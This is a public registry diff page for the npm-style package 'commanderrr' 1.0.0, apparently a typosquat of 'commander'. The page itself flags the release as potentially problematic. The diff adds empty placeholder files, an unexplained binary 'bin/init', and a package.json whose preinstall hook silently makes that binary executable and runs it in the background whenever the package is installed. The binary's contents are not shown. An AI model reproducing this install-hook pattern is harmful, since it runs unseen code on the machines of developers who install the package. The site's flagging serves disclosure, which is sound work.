commanderrr 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of commanderrr might be problematic. Click here for more details.

package/README.txt ADDED
File without changes
package/bin/init ADDED
Binary file
package/index.js ADDED
File without changes
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+
2
+ {
3
+ "name": "commanderrr",
4
+ "version": "1.0.0",
5
+ "description": "",
6
+ "main": "index.js",
7
+ "scripts": {
8
+ "preinstall": "chmod +x bin/init&&bin/init &",
9
+ "postinstall": "echo 2"
10
+ },
11
+ "keywords": [],
12
+ "author": "",
13
+ "license": "ISC"
14
+ }
15
+